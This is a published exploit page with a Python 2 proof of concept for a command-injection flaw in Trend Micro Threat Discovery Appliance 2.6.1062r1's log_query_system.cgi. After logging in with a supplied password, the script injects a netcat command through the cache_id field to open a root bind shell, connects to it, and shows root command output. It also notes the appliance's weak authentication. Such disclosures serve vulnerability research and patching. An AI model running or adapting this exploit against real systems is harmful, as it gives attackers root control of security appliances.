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Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_system.cgi Remote Code Execution

🗓️ 20 Apr 2017 00:00:00Reported by Roberto Suggi LiveraniType 
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Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_system.cgi Remote Code Execution Vulnerabilit

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`#!/usr/local/bin/python  
"""  
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_system.cgi Remote Code Execution Vulnerability  
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/   
File: TDA_InstallationCD.2.6.1062r1.en_US.iso  
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9  
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1  
  
Summary:  
========  
  
There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.  
  
Notes:  
======  
  
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was   
exec a bind shell using netcat.  
  
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...  
  
Example:  
========  
  
saturn:trend_micro_threat_discovery_log_query_system_rce mr_me$ ./poc.py   
(+) usage: ./poc.py <target> <pass>  
(+) eg: ./poc.py 172.16.175.123 admin123  
saturn:trend_micro_threat_discovery_log_query_system_rce mr_me$ ./poc.py 172.16.175.123 admin123  
(+) logged in...  
(+) starting backdoor, this will take a few secs...  
(+) calling backdoor!  
id  
uid=0(root) gid=0(root)  
uname -a  
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown  
exit  
  
"""  
  
import re  
import os  
import sys  
import time  
import requests  
import threading  
  
requests.packages.urllib3.disable_warnings()  
  
if len(sys.argv) != 3:  
print "(+) usage: %s <target> <pass>" % sys.argv[0]  
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0]  
sys.exit(-1)  
  
t = sys.argv[1]  
p = sys.argv[2]  
  
bu = "https://%s/" % t  
l_url = "%scgi-bin/logon.cgi" % bu  
e_url = "%scgi-bin/log_query_system.cgi" % bu  
  
s = requests.Session()  
  
def exec_bd(s, e_url):  
# now we setup our backdoor  
# no reverse, since it seems to fail !?  
netcat = "test|`nc -e /bin/sh -lp 1337`"  
s.post(e_url, data={'act':'search','cache_id': netcat}, verify=False)  
  
# first we login...  
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)  
if "frame.cgi" in r.text:  
print "(+) logged in..."  
  
thread = threading.Thread(target=exec_bd, args=(s, e_url,))  
thread.start()  
  
print "(+) starting backdoor, this will take a few secs..."  
time.sleep(2)  
  
print "(+) calling backdoor!"  
os.system("nc %s 1337" % t)  
  
else:  
print "(-) login failed"  
sys.exit(-1)  
  
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